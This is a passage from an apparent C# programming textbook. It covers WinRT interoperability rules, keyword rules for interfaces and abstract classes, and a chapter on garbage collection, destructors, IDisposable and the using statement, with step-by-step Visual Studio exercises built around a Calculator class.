On the other hand, WinRT provides a significant set of features and
types that have no direct equivalent in the .NET Framework or that
operate in a significantly different way to the corresponding features in
the .NET Framework, and so cannot easily be translated. WinRT makes
these features available to the CLR through a mapping layer that makes
them look like .NET Framework types and methods, and you can
invoke them directly from managed code.
So, integration implemented by the CLR and WinRT enables the
CLR to transparently use WinRT types, but it also supports
interoperability in the reverse direction: you can define types by using
managed code and make them available to unmanaged applications as
long as these types conform to the expectations of WinRT. Chapter 9
highlights the requirements of structs in this respect (instance and static
methods in structs are not available through WinRT, and private fields
are unsupported). If you are building classes with the intention that they
be consumed by unmanaged applications through WinRT, your classes
must follow these rules:
Any public fields, and the parameters and return values of any
public methods, must be WinRT types or .NET Framework types
that can be transparently translated by WinRT into WinRT types.
Examples of supported .NET Framework types include
conforming value types (such as structs and enums) and those
corresponding to the C# primitives (int, long, float, double, string,
and so on). Private fields are supported in classes, and they can be
of any type available in the .NET Framework; they do not have to
conform to WinRT.
Classes cannot override methods of System.Object other than
ToString, and they cannot declare protected constructors.
The namespace in which a class is defined must be the same as
the name of the assembly implementing the class. Additionally,
the namespace name (and therefore the assembly name) must not
begin with “Windows.”
You cannot inherit from managed types in unmanaged
applications through WinRT. Therefore, all public classes must
be sealed. If you need to implement polymorphism, you can
create a public interface and implement that interface on the
classes that must be polymorphic.
You can throw any exception type that is included in the subset of
the .NET Framework available to UWP apps; you cannot create
your own custom exception classes. If your code throws an
unhandled exception when called from an unmanaged
application, WinRT raises an equivalent exception in the
unmanaged code.
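As a purely hypothetical illustration (the namespace, class, and member
names here are invented), a class that conforms to these rules might look
like this, assuming that the containing assembly is also named MyComponent:

namespace MyComponent // must match the assembly name and must not begin with "Windows"
{
    public sealed class Thermometer // public classes must be sealed
    {
        private double celsius; // private fields can be any .NET Framework type

        public void SetCelsius(double value) // parameters use supported types
        {
            this.celsius = value;
        }

        public double GetFahrenheit() // return values use supported types
        {
            return (this.celsius * 9 / 5) + 32;
        }
    }
}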
WinRT has other requirements concerning features of C# code
covered later in this book. These requirements will be highlighted as
each feature is described.
Summary
In this chapter, you saw how to define and implement interfaces and abstract
classes. The following table summarizes the various valid (yes) and invalid
(no) keyword combinations when defining methods for interfaces, classes,
and structs.
Keyword     Interface   Abstract class   Class   Sealed class   Structure
Abstract    No          Yes              No      No             No
New         Yes¹        Yes              Yes     Yes            No²
Override    No          Yes              Yes     Yes            No³
Private     No          Yes              Yes     Yes            Yes
Protected   No          Yes              Yes     Yes            No⁴
Public      No          Yes              Yes     Yes            Yes
Sealed      No          Yes              Yes     Yes            No
Virtual     No          Yes              Yes     No             No
1 An interface can extend another interface and introduce a new method with
the same signature.
2 Structures do not support inheritance, so they cannot hide methods.
3 Structures do not support inheritance, so they cannot override methods.
4 Structures do not support inheritance; a structure is implicitly sealed and
cannot be derived from.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 14.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To: Declare an interface
Do this: Use the interface keyword. For example:

interface IDemo
{
    string GetName();
    string GetDescription();
}
To: Implement an interface
Do this: Declare a class by using the same syntax as class inheritance, and then implement all the member functions of the interface. For example:

class Test : IDemo
{
    string IDemo.GetName()
    {
        ...
    }
    string IDemo.GetDescription()
    {
        ...
    }
}
To: Create an abstract class that can be used only as a base class, containing abstract methods
Do this: Declare the class by using the abstract keyword. For each abstract method, declare the method with the abstract keyword and without a method body. For example:

abstract class GrazingMammal
{
    public abstract void DigestGrass();
    ...
}
To: Create a sealed class that cannot be used as a base class
Do this: Declare the class by using the sealed keyword. For example:

sealed class Horse
{
    ...
}
CHAPTER 14
Using garbage collection and
resource management
After completing this chapter, you will be able to:
Manage system resources by using garbage collection.
Write code that runs when an object is destroyed.
Release a resource at a known point in time in an exception-safe
manner by writing a try/finally statement.
Release a resource at a known point in time in an exception-safe
manner by writing a using statement.
Implement the IDisposable interface to support exception-safe disposal
in a class.
You have seen in earlier chapters how to create variables and objects, and
you should understand how memory is allocated when you create variables
and objects. (In case you don’t remember, value types are created on the
stack, and reference types are allocated memory from the heap.) Computers
do not have infinite amounts of memory, so memory must be reclaimed when
a variable or an object no longer needs it. Value types are destroyed and their
memory reclaimed when they go out of scope. That’s the easy bit. How about
reference types? You create an object by using the new keyword, but how
and when is an object destroyed? That’s what this chapter is all about.
The life and times of an object
First, let’s recap what happens when you create an object.
You create an object by using the new operator. The following example
creates a new instance of the Square class that is discussed in Chapter 13,
“Creating interfaces and defining abstract classes.”
int sizeOfSquare = 99;
Square mySquare = new Square(sizeOfSquare); // Square is a reference type
From your point of view, the new operation is a single step, but
underneath, object creation is really a two-phase process:
1. The new operation allocates a chunk of raw memory from the heap. You
have no control over this phase of an object’s creation.
2. The new operation converts the chunk of raw memory to an object; it
has to initialize the object. You can control this phase by using a
constructor.
Note If you are a C++ programmer, you should note that in C#, you
cannot overload the new operation to control allocation.
After you create an object, you can access its members by using the dot
operator (.). For example, the Square class includes a method named Draw
that you can call:
mySquare.Draw();
Note This code is based on the version of the Square class that inherits
from the DrawingShape abstract class and does not implement the
IDraw interface explicitly. For more information, refer to Chapter 13.
When the mySquare variable goes out of scope, the Square object is no
longer being actively referenced. The object can then be destroyed, and the
memory that it is using can be reclaimed. (This might not happen
immediately, however, as you will see later.) Like object creation, object
destruction is a two-phase process. The two phases of destruction exactly
mirror the two phases of creation:
1. The common language runtime (CLR) must perform some tidying up.
You can control this by writing a destructor.
2. The CLR must return the memory previously belonging to the object
back to the heap; the memory that the object lived in must be
deallocated. You have no control over this phase.
The process of destroying an object and returning memory to the heap is
known as garbage collection.
Note If you program in C++, keep in mind that C# does not have a
delete operator. The CLR controls when an object is destroyed.
Writing destructors
You can use a destructor to perform any tidying up that’s required when an
object is garbage collected. The CLR will automatically clear up any
managed resources that an object uses, so in many of these cases, writing a
destructor is unnecessary. However, if a managed resource is large (such as a
multidimensional array), it might make sense to make this resource available
for immediate disposal by setting any references that the object has to this
resource to null. Additionally, if an object references an unmanaged resource,
either directly or indirectly, a destructor can prove useful.
Note Indirect unmanaged resources are reasonably common. Examples
include file streams, network connections, database connections, and
other resources managed by Windows. If you open a file in a method,
for example, you might want to add a destructor that closes the file
when the object is destroyed. However, there might be a better and
timelier way to close the file depending on the structure of the code in
your class. (See the discussion of the using statement later in this
chapter.)
A destructor is a special method, a little like a constructor, except that the
CLR calls it after the reference to an object has disappeared.
Note Don’t confuse destructors with deconstructors (described in
Chapter 7, “Creating and managing classes and objects”), which you
can implement to retrieve the internal fields of an object.
The syntax for writing a destructor is a tilde (~) followed by the name of
the class. For example, here’s a simple class that opens a file for reading in its
constructor and closes the file in its destructor. (Note that this is simply an
example, and I do not recommend that you always follow this pattern for
opening and closing files.)
class FileProcessor
{
FileStream file = null;
public FileProcessor(string fileName)
{
this.file = File.OpenRead(fileName); // open file for reading
}
~FileProcessor()
{
this.file.Close(); // close file
}
}
There are some very important restrictions that apply to destructors:
Destructors apply only to reference types; you cannot declare a
destructor in a value type, such as a struct.
struct MyStruct
{
~MyStruct() { ... } // compile-time error
}
You cannot specify an access modifier (such as public) for a destructor.
You never call the destructor in your own code; part of the CLR called
the garbage collector does this for you.
public ~FileProcessor() { ... } // compile-time error
A destructor cannot take any parameters. Again, this is because you
never call the destructor yourself.
~FileProcessor(int parameter) { ... } // compile-time error
Internally, the C# compiler automatically translates a destructor into an
override of the Object.Finalize method. The compiler converts this
destructor:
class FileProcessor
{
~FileProcessor()
{
// your code goes here
}
}
into this:
class FileProcessor
{
protected override void Finalize()
{
try
{
// your code goes here
}
finally
{
base.Finalize();
}
}
}
The compiler-generated Finalize method contains the destructor body
within a try block, followed by a finally block that calls the Finalize method
in the base class. (The try and finally keywords are described in Chapter 6,
“Managing errors and exceptions.”) This ensures that a destructor always
calls its base-class destructor, even if an exception occurs during your
destructor code.
It’s important to understand that only the compiler can make this
translation. You can’t write your own method to override Finalize, and you
can’t call Finalize yourself.
Why use the garbage collector?
You can never destroy an object yourself by using C# code. There just isn’t
any syntax to do it. Instead, the CLR does it for you at a time of its own
choosing. Also, keep in mind that you can make more than one reference
variable refer to the same object. In the following code example, the variables
myFp and referenceToMyFp point to the same FileProcessor object:
FileProcessor myFp = new FileProcessor();
FileProcessor referenceToMyFp = myFp;
How many references can you create to an object? As many as you want!
But this lack of restriction has an impact on the lifetime of an object. The
CLR has to keep track of all these references. If the variable myFp disappears
(by going out of scope), other variables (such as referenceToMyFp) might
still exist, and the resources used by the FileProcessor object cannot be
reclaimed (the file should not be closed). So the lifetime of an object cannot
be tied to a particular reference variable. An object can be destroyed and its
memory made available for reuse only when all the references to it have
disappeared.
You can see that managing object lifetimes is complex, which is why the
designers of C# decided to prevent your code from taking on this
responsibility. If it were your responsibility to destroy objects, sooner or later
one of the following situations would arise:
You’d forget to destroy the object. This would mean that the object’s
destructor (if it had one) would not be run, tidying up would not occur,
and memory would not be returned to the heap. You could quite easily
run out of memory.
You’d try to destroy an active object and risk the possibility that one or
more variables hold a reference to a destroyed object, which is known
as a dangling reference. A dangling reference refers either to unused
memory or possibly to a completely different object that now happens
to occupy the same piece of memory. Either way, the outcome of using
a dangling reference would be undefined at best or a security risk at
worst. All bets would be off.
You’d try to destroy the same object more than once. This might or
might not be disastrous, depending on the code in the destructor.
These problems are unacceptable in a language like C#, which places
robustness and security high on its list of design goals. Instead, the garbage
collector destroys objects for you. The garbage collector makes the following
guarantees:
Every object will be destroyed, and its destructor will be run. When a
program ends, all outstanding objects will be destroyed.
Every object will be destroyed exactly once.
Every object will be destroyed only when it becomes unreachable—
that is, when there are no references to the object in the process
running your application.
These guarantees are tremendously useful, and they free you, the
programmer, from tedious housekeeping chores that are easy to get wrong.
They afford you the luxury to concentrate on the logic of the program itself
and be more productive.
When does garbage collection occur? This might seem like a strange
question. After all, surely garbage collection occurs when an object is no
longer needed. Well, it does, but not necessarily immediately. Garbage
collection can be an expensive process, so the CLR collects garbage only
when it needs to (when available memory is starting to run low, or the size of
the heap has exceeded the system-defined threshold, for example), and then it
collects as much as it can. Performing a few large sweeps of memory is more
efficient than performing lots of little dustings.
Note You can invoke the garbage collector in a program by calling the
static method Collect of the GC class located in the System namespace.
However, except in a few cases, this is not recommended. The
GC.Collect method starts the garbage collector, but the process runs
asynchronously—the GC.Collect method does not wait for garbage
collection to be complete before it returns, so you still don’t know
whether your objects have been destroyed. Let the CLR decide when it
is best to collect garbage.
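If you really do need to force a collection (in test code, for example),
you can follow the call to GC.Collect with a call to the static
GC.WaitForPendingFinalizers method, which blocks until the finalization
queue has been emptied:

// Use sparingly: force a collection, and then wait for any
// outstanding finalizers to complete
GC.Collect();
GC.WaitForPendingFinalizers();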
One feature of the garbage collector is that you don’t know, and should
not rely upon, the order in which objects will be destroyed. The final point to
understand is arguably the most important: destructors do not run until
objects are garbage collected. If you write a destructor, you know it will be
executed, but you just don’t know when. Consequently, you should never
write code that depends on destructors running in a particular sequence or at a
specific point in your application.
How does the garbage collector work?
The garbage collector runs in its own thread and can execute only at certain
times—typically when your application reaches the end of a method. While it
runs, other threads running in your application will temporarily halt because
the garbage collector might need to move objects around and update object
references, and it cannot do this while objects are in use.
Note A thread is a separate path of execution in an application.
Windows uses threads to enable an application to perform multiple
operations concurrently.
The garbage collector is a complex piece of software that is self-tuning
and implements some optimizations to try to balance the need to keep
memory available with the requirement to maintain the performance of the
application. The details of the internal algorithms and structures that the
garbage collector uses are beyond the scope of this book (and Microsoft
continually refines the way in which the garbage collector performs its work),
but at a high level, the steps that the garbage collector takes are as follows:
1. It builds a map of all reachable objects. It does this by repeatedly
following reference fields inside objects. The garbage collector builds
this map very carefully and ensures that circular references do not cause
infinite recursion. Any object not in this map is deemed to be
unreachable.
2. It checks whether any of the unreachable objects has a destructor that
needs to be run (a process called finalization). Any unreachable object
that requires finalization is placed in a special queue called the
freachable queue (pronounced “F-reachable”).
3. It deallocates the remaining unreachable objects (those that don’t require
finalization) by moving the reachable objects down the heap, thus
defragmenting the heap and freeing memory at its top. When the
garbage collector moves a reachable object, it also updates any
references to the object.
4. At this point, it allows other threads to resume.
5. It finalizes the unreachable objects that require finalization (now in the
freachable queue) by running the Finalize methods on its own thread.
Recommendations
Writing classes that contain destructors adds complexity to your code and the
garbage collection process and makes your program run more slowly. If your
program does not contain any destructors, the garbage collector does not need
to place unreachable objects in the freachable queue and finalize them.
Clearly, not doing something is faster than doing it. Therefore, try to avoid
using destructors except when you really need them—use them only to
reclaim unmanaged resources. (You can consider a using statement instead,
as will be described later in this chapter.)
You need to be very careful when you write a destructor. In particular, be
aware that if your destructor calls other objects, those other objects might
have already had their destructor called by the garbage collector. Remember
that the order of finalization is not guaranteed. Therefore, ensure that
destructors do not depend on one another or overlap one another—don’t have
two destructors that try to release the same resource, for example.
Resource management
Sometimes it’s inadvisable to release a resource in a destructor; some
resources are just too valuable to lie around waiting for an arbitrary length of
time until the garbage collector actually releases them. Scarce resources such
as memory, database connections, or file handles need to be released, and
they need to be released as soon as possible. In these situations, your only
option is to release the resource yourself. You can achieve this by creating a
disposal method—a method that explicitly disposes of a resource. If a class
has a disposal method, you can call it and control when the resource is
released.
Note The term disposal method refers to the purpose of the method
rather than its name. A disposal method can be named using any valid
C# identifier.
Disposal methods
An example of a class that implements a disposal method is the TextReader
class from the System.IO namespace. This class provides a mechanism to
read characters from a sequential stream of input. The TextReader class
contains a virtual method named Close, which closes the stream. The
StreamReader class (which reads characters from a stream, such as an open
file) and the StringReader class (which reads characters from a string) both
derive from TextReader, and both override the Close method. Here’s an
example that reads lines of text from a file by using the StreamReader class
and then displays them on the screen:
TextReader reader = new StreamReader(filename);
string line;
while ((line = reader.ReadLine()) != null)
{
Console.WriteLine(line);
}
reader.Close();
The ReadLine method reads the next line of text from the stream into a
string. The ReadLine method returns null if there is nothing left in the stream.
It’s important to call Close when you have finished with reader to release the
file handle and associated resources. However, there is a problem with this
example: it’s not safe from exceptions. If the call to ReadLine or WriteLine
throws an exception, the call to Close will not happen; it will be bypassed. If
this happens often enough, you will run out of file handles and be unable to
open any more files.
Exception-safe disposal
One way to ensure that a disposal method (such as Close) is always called,
regardless of whether there is an exception, is to call the disposal method
within a finally block. Here’s the preceding example coded by using this
technique:
TextReader reader = new StreamReader(filename);
try
{
string line;
while ((line = reader.ReadLine()) != null)
{
Console.WriteLine(line);
}
}
finally
{
reader.Close();
}
Using a finally block like this works, but it has several drawbacks that
make it a less-than-ideal solution:
It quickly becomes unwieldy if you have to dispose of more than one
resource. (You end up with nested try and finally blocks.)
In some cases, you might need to modify the code to make it fit this
idiom. (For example, you might need to reorder the declaration of the
resource reference, remember to initialize the reference to null, and
remember to check that the reference isn’t null in the finally block.)
It fails to create an abstraction of the solution. This means that the
solution is hard to understand and you must repeat the code everywhere
you need this functionality.
The reference to the resource remains in scope after the finally block.
This means that you can accidentally try to use the resource after it has
been released.
The using statement is designed to solve all these problems.
The using statement and the IDisposable interface
The using statement provides a clean mechanism for controlling the lifetimes
of resources. You can create an object, and this object will be destroyed when
the using statement block finishes.
Important Do not confuse the using statement shown in this section
with the using directive that brings a namespace into scope. It is
unfortunate that the same keyword has two different meanings.
The syntax for a using statement is as follows:
using ( type variable = initialization )
{
StatementBlock
}
Here is the best way to ensure that your code always calls Close on a
TextReader:
using (TextReader reader = new StreamReader(filename))
{
string line;
while ((line = reader.ReadLine()) != null)
{
Console.WriteLine(line);
}
}
This using statement is equivalent to the following transformation:
{
TextReader reader = new StreamReader(filename);
try
{
string line;
while ((line = reader.ReadLine()) != null)
{
Console.WriteLine(line);
}
}
finally
{
if (reader != null)
{
((IDisposable)reader).Dispose();
}
}
}
Note The using statement introduces its own block for scoping
purposes. This arrangement means that the variable you declare in a
using statement automatically goes out of scope at the end of the
embedded statement and you cannot accidentally attempt to access a
disposed resource.
The variable you declare in a using statement must be of a type that
implements the IDisposable interface. The IDisposable interface lives in the
System namespace and contains just one method, named Dispose:
namespace System
{
interface IDisposable
{
void Dispose();
}
}
The purpose of the Dispose method is to free any resources used by an
object. It just so happens that the StreamReader class implements the
IDisposable interface, and its Dispose method calls Close to close the stream.
You can employ a using statement as a clean, exception-safe, and robust way
to ensure that a resource is always released. This approach solves all the
problems that existed in the manual try/finally solution. You now have a
solution that does the following:
Scales well if you need to dispose of multiple resources.
Doesn’t distort the logic of the program code.
Abstracts away the problem and avoids repetition.
Is robust. You can’t accidentally reference the variable declared within
the using statement (in this case, reader) after the using statement has
ended because it’s not in scope anymore—you’ll get a compile-time
error.
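One aspect of this scalability is that you can stack using statements
without nesting braces. A short sketch (the file names are purely
illustrative):

using (TextReader first = new StreamReader("first.txt"))
using (TextReader second = new StreamReader("second.txt"))
{
    // Both readers are disposed of when this block ends, in reverse
    // order of creation, even if an exception occurs
    Console.WriteLine(first.ReadLine());
    Console.WriteLine(second.ReadLine());
}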
Calling the Dispose method from a destructor
When writing your own classes, should you write a destructor or implement
the IDisposable interface so that instances of your class can be managed by a
using statement? A call to a destructor will happen, but you just don’t know
when. On the other hand, you know exactly when a call to the Dispose
method happens, but you just can’t be sure that it will actually happen
because it relies on the programmer who is using your classes to remember to
write a using statement. However, it is possible to ensure that the Dispose
method always runs by calling it from the destructor. This acts as a useful
backup. You might forget to call the Dispose method, but at least you can be
sure that it will be called, even if it’s only when the program shuts down. You
will investigate this feature in detail in the exercises at the end of the chapter,
but here’s an example of how you might implement the IDisposable
interface:
class Example : IDisposable
{
private Resource scarce; // scarce resource to manage and dispose
private bool disposed = false; // flag to indicate whether the resource
// has already been disposed
...
~Example()
{
this.Dispose(false);
}
public virtual void Dispose()
{
this.Dispose(true);
GC.SuppressFinalize(this);
}
protected virtual void Dispose(bool disposing)
{
if (!this.disposed)
{
if (disposing)
{
// release large, managed resource here
...
}
// release unmanaged resources here
...
this.disposed = true;
}
}
public void SomeBehavior() // example method
{
checkIfDisposed();
...
}
...
private void checkIfDisposed()
{
if (this.disposed)
{
throw new ObjectDisposedException("Example: object has been disposed");
}
}
}
Notice the following features of the Example class:
The class implements the IDisposable interface.
The public Dispose method can be called at any time by your
application code.
The public Dispose method calls the protected and overloaded version
of the Dispose method that takes a Boolean parameter, passing the
value true as the argument. This method actually performs the resource
disposal.
The destructor calls the protected and overloaded version of the
Dispose method that takes a Boolean parameter, passing the value false
as the argument. The destructor is called only by the garbage collector
when your object is being finalized.
You can call the protected Dispose method safely multiple times. The
variable disposed indicates whether the method has already been run
and is a safety feature to prevent the method from attempting to
dispose of the resources multiple times if it is called concurrently.
(Your application might call Dispose, but before the method completes,
your object might be subject to garbage collection and the Dispose
method run again by the CLR from the destructor.) The resources are
released only the first time the method runs.
The protected Dispose method supports disposal of managed resources
(such as a large array) and unmanaged resources (such as a file handle).
If the disposing parameter is true, this method must have been called
from the public Dispose method. In this case, the managed resources
and unmanaged resources are all released. If the disposing parameter is
false, this method must have been called from the destructor, and the
garbage collector is finalizing the object. In this case, it is not
necessary (or exception-safe) to release the managed resources because
they will be, or might already have been, handled by the garbage
collector, so only the unmanaged resources are released.
The public Dispose method calls the static GC.SuppressFinalize
method. This method stops the garbage collector from calling the
destructor on this object because the object has already been finalized.
All the regular methods of the class (such as SomeBehavior) check to
see whether the object has already been discarded. If it has, they throw
an exception.
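Putting this together, application code would typically manage an Example
object like this (a sketch, assuming that Example has a parameterless
constructor):

using (Example example = new Example())
{
    example.SomeBehavior(); // safe: the object has not been disposed of yet
}
// The public Dispose method runs here, and GC.SuppressFinalize
// ensures that the destructor will not run a second time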
Implementing exception-safe disposal
In the following set of exercises, you will examine how the using statement
helps to ensure that resources used by objects in your applications can be
released promptly, even if an exception occurs in your application code.
Initially, you will implement a simple class that implements a destructor and
examine when this destructor is invoked by the garbage collector.
Note The Calculator class created in these exercises is intended only to
illustrate the essential principles of garbage collection. The class does
not actually consume any significant managed or unmanaged resources.
You would not normally create a destructor or implement the
IDisposable interface for such a simple class as this.
Create a simple class that uses a destructor
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. On the File menu, point to New, and then click Project.
The New Project dialog box opens.
3. In the New Project dialog box, in the left pane, click Visual C#. In the
middle pane, select the Console App (.NET Framework) template. In the
Name box near the bottom of the dialog box, type
GarbageCollectionDemo. In the Location field, specify the folder
Microsoft Press\VCSBS\Chapter 14 in your Documents folder, and then
click OK.
Tip You can use the Browse button adjacent to the Location field
to navigate to the Microsoft Press\VCSBS\Chapter 14 folder
instead of typing the path manually.
Visual Studio creates a new console application and displays the
Program.cs file in the Code and Text Editor window.
4. On the Project menu, click Add Class.
The Add New Item – GarbageCollectionDemo dialog box opens.
5. In the Add New Item – GarbageCollectionDemo dialog box, ensure that
the Class template is selected. In the Name box, type Calculator.cs, and
then click Add.
The Calculator class is created and displayed in the Code and Text
Editor window.
6. Add the following public Divide method (shown in bold) to the
Calculator class:
class Calculator
{
public int Divide(int first, int second)
{
return first / second;
}
}
This is a very straightforward method that divides the first parameter by
the second and returns the result. It is provided just to add a bit of
functionality that can be called by an application.
7. Above the Divide method, add the public constructor shown in bold in
the code that follows:
class Calculator
{
public Calculator()
{
Console.WriteLine("Calculator being created");
}
...
}
The purpose of this constructor is to enable you to verify that a
Calculator object has been successfully created.
8. Add the destructor shown in bold in the following code, after the
constructor:
class Calculator
{
...
~Calculator()
{
Console.WriteLine("Calculator being finalized");
}
...
}
This destructor simply displays a message so that you can see when the
garbage collector runs and finalizes instances of this class. When writing
classes for real-world applications, you would not normally output text
in a destructor.
9. Display the Program.cs file in the Code and Text Editor window.
10. In the Program class, add the following statements shown in bold to the
Main method:
static void Main(string[] args)
{
Calculator calculator = new Calculator();
Console.WriteLine($"120 / 15 = {calculator.Divide(120,
15)}");
Console.WriteLine("Program finishing");
}
This code creates a Calculator object, calls the Divide method of this
object (and displays the result), and then outputs a message as the
program finishes.
11. On the Debug menu, click Start Without Debugging. Verify that the
program displays the following series of messages:
Calculator being created
120 / 15 = 8
Program finishing
Calculator being finalized
Notice that the finalizer for the Calculator object runs only when the
application is about to finish, after the Main method has completed.
12. In the console window, press the Enter key and return to Visual Studio
2017.
The CLR guarantees that all objects created by your applications will be
subject to garbage collection, but you cannot always be sure when this will
happen. In the exercise, the program was very short-lived, and the Calculator
object was finalized when the CLR tidied up as the program finished.
However, you might also find that this is the case in more substantial
applications with classes that consume scarce resources, and unless you take
the necessary steps to provide a means of disposal, the objects that your
applications create might retain their resources until the application finishes.
If the resource is a file, this could prevent other users from being able to
access that file; if the resource is a database connection, your application
could prevent other users from being able to connect to the same database.
Ideally, you want to free resources as soon as you have finished using them
rather than wait for the application to terminate.
In the next exercise, you will implement the IDisposable interface in the
Calculator class and enable the program to finalize Calculator objects at a
time of its choosing.
Implement the IDisposable interface
1. Display the Calculator.cs file in the Code and Text Editor window.
2. Modify the definition of the Calculator class so that it implements the
IDisposable interface, as shown here in bold:
class Calculator : IDisposable
{
...
}
3. Add the following method shown in bold, named Dispose, to the end of
the Calculator class. This method is required by the IDisposable
interface:
class Calculator : IDisposable
{
...
public void Dispose()
{
Console.WriteLine("Calculator being disposed");
}
}
You would normally add code to the Dispose method that releases the
resources held by the object. There are none in this case; the purpose of
the Console.WriteLine statement is simply to let you see when the Dispose
method runs. However, you can see that in a real-
world application, there would likely be some duplication of code
between the destructor and the Dispose method. To remove this
duplication, you would typically place this code in one place and call it
from the other. But because you cannot explicitly invoke a destructor
from the Dispose method, it makes sense instead to call the Dispose
method from the destructor and place the logic that releases resources in
the Dispose method.
4. Modify the destructor so that it calls the Dispose method, as shown in
bold in the following code. (Leave the statement displaying the message
in place in the finalizer so that you can see when it is being run by the
garbage collector).
~Calculator()
{
Console.WriteLine("Calculator being finalized");
this.Dispose();
}
When you want to destroy a Calculator object in an application, the
Dispose method does not run automatically; your code must either call it
explicitly (with a statement such as calculator.Dispose()) or create the
Calculator object within a using statement. In your program, you will
adopt the latter approach.
5. Display the Program.cs file in the Code and Text Editor window.
Modify the statements in the Main method that create the Calculator
object and call the Divide method, as shown here in bold:
static void Main(string[] args)
{
using (Calculator calculator = new Calculator())
{
Console.WriteLine($"120 / 15 = {calculator.Divide(120, 15)}");
}
Console.WriteLine("Program finishing");
}
6. On the Debug menu, click Start Without Debugging. Verify that the
program now displays the following series of messages:
Calculator being created
120 / 15 = 8
Calculator being disposed
Program finishing
Calculator being finalized
Calculator being disposed
The using statement causes the Dispose method to run before the
statement that displays the “Program finishing” message. However, you
can see that the destructor for the Calculator object still runs when the
application finishes, and it calls the Dispose method again. This is
clearly a waste of processing.
7. In the console window, press the Enter key and return to Visual Studio
2017.
Disposing of the resources held by an object more than once might or
might not be disastrous, but it is definitely not good practice. The
recommended approach to resolving this problem is to add a private Boolean
field to the class to indicate whether the Dispose method has already been
invoked, and then examine this field in the Dispose method.
Prevent an object from being disposed of more than once
1. Display the Calculator.cs file in the Code and Text Editor window.
2. Add a private Boolean field called disposed to the start of the Calculator
class. Initialize the value of this field to false, as shown in bold in the
following code:
class Calculator : IDisposable
{
private bool disposed = false;
...
}
The purpose of this field is to track the state of this object and indicate
whether the Dispose method has been invoked.
3. Modify the code in the Dispose method to display the message only if
the disposed field is false. After displaying the message, set the disposed
field to true, as shown here in bold:
public void Dispose()
{
if (!this.disposed)
{
Console.WriteLine("Calculator being disposed");
}
this.disposed = true;
}
4. On the Debug menu, click Start Without Debugging. Notice that the
program displays the following series of messages:
Calculator being created
120 / 15 = 8
Calculator being disposed
Program finishing
Calculator being finalized
The Calculator object is now discarded only once, but the destructor is
still running. Again, this is a waste; there is little point in running a
destructor for an object that has already released its resources.
5. In the console window, press the Enter key and return to Visual Studio
2017.
6. In the Calculator class, add the following statement shown in bold to the
end of the Dispose method:
public void Dispose()
{
if (!this.disposed)
{
Console.WriteLine("Calculator being disposed");
}
this.disposed = true;
GC.SuppressFinalize(this);
}
The GC class provides access to the garbage collector, and it
implements several static methods with which you can control some of
the actions it performs. Using the SuppressFinalize method, you can
indicate that the garbage collector should not perform finalization on the
specified object, and this prevents the destructor from running.
Important The GC class exposes several methods with which you
can configure the garbage collector. However, it is usually better to
let the CLR manage the garbage collector itself because you can
seriously impair the performance of your application if you call
these methods injudiciously. You should treat the SuppressFinalize
method with extreme caution because if you fail to dispose of an
object, you run the risk of losing data (if you fail to close a file
correctly, for example, any data buffered in memory but not yet
written to disk could be lost). Call this method only in situations
such as that shown in this exercise, when you know that an object
has already been discarded.
7. On the Debug menu, click Start Without Debugging. Notice that the
program displays the following series of messages:
Calculator being created
120 / 15 = 8
Calculator being disposed
Program finishing
You can see that the destructor is no longer running because the
Calculator object has already been disposed of before the program
finishes.
8. In the console window, press the Enter key and return to Visual Studio
2017.
Thread safety and the Dispose method
The example of using the disposed field to prevent an object from being
discarded multiple times works well in most cases, but keep in mind
that you have no control over when the finalizer runs. In the exercises in
this chapter, it has always executed as the program finishes, but this
might not always be the case—it can run anytime after the last reference
to an object has disappeared. So it is possible that the finalizer might
actually be invoked by the garbage collector on its own thread while the
Dispose method is being run, especially if the Dispose method has to do
a significant amount of work. You could reduce the possibility of
resources being released multiple times by moving the statement that
sets the disposed field to true closer to the start of the Dispose method,
but in this case you run the risk of not freeing the resources at all if an
exception occurs after you have set this variable but before you have
released them.
To eliminate the chances of two concurrent threads disposing of the
same resources in the same object simultaneously, you can write your
code in a thread-safe manner by embedding it in a C# lock statement,
like this:
public void Dispose()
{
lock(this)
{
if (!disposed)
{
Console.WriteLine("Calculator being disposed");
}
this.disposed = true;
GC.SuppressFinalize(this);
}
}
The purpose of the lock statement is to prevent the same block of
code from being run at the same time on different threads. The
argument to the lock statement (this in the preceding example) should
be a reference to an object. The code between the curly braces defines
the scope of the lock statement. When execution reaches the lock
statement, if the specified object is currently locked, the thread
requesting the lock is blocked, and the code is suspended at this point.
When the thread that currently holds the lock reaches the closing curly
brace of the lock statement, the lock is released, enabling the blocked
thread to acquire the lock itself and continue. However, by the time this
happens, the disposed field will have been set to true, so the second
thread will not attempt to perform the code in the if (!disposed) block.
Using locks in this manner is safe, but it can harm performance. An
alternative approach is to use the strategy described earlier in this
chapter, whereby only the repeated disposal of managed resources is
suppressed. (It is not exception-safe to dispose of managed resources
more than once; you will not compromise the security of your
computer, but you might affect the logical integrity of your application
if you attempt to dispose of a managed object that no longer exists.)
This strategy implements overloaded versions of the Dispose method;
the using statement calls Dispose(), which in turn runs the statement
Dispose(true), while the destructor invokes Dispose(false). Managed
resources are freed only if the parameter to the overloaded version of
the Dispose method is true. For more information, refer back to the
example in the section “Calling the dispose method from a destructor.”
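For reference, here is a minimal sketch of that overloaded pattern applied to the Calculator class; the exact fields and messages are illustrative rather than part of this chapter's exercise code:
class Calculator : IDisposable
{
    private bool disposed = false;
    // Called by the using statement or explicitly by client code.
    public void Dispose()
    {
        Dispose(true);
        GC.SuppressFinalize(this);
    }
    // Called by the garbage collector during finalization.
    ~Calculator()
    {
        Dispose(false);
    }
    protected virtual void Dispose(bool disposing)
    {
        if (!this.disposed)
        {
            if (disposing)
            {
                // Release managed resources only when called from Dispose(),
                // never from the finalizer.
                Console.WriteLine("Calculator being disposed");
            }
            // Release any unmanaged resources here in both cases.
            this.disposed = true;
        }
    }
}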
The purpose of the using statement is to ensure that an object is always
discarded, even if an exception occurs while it is being used. In the final
exercise in this chapter, you will verify that this is the case by generating an
exception in the middle of a using block.
Verify that an object is disposed of after an exception
1. Display the Program.cs file in the Code and Text Editor window.
2. Modify the statement that calls the Divide method of the Calculator
object as shown in bold:
static void Main(string[] args)
{
using (Calculator calculator = new Calculator())
{
Console.WriteLine($"120 / 0 = {calculator.Divide(120, 0)}");
}
Console.WriteLine("Program finishing");
}
The amended statement attempts to divide 120 by 0.
3. On the Debug menu, click Start Without Debugging.
As you might have anticipated, the application throws an unhandled
DivideByZeroException exception.
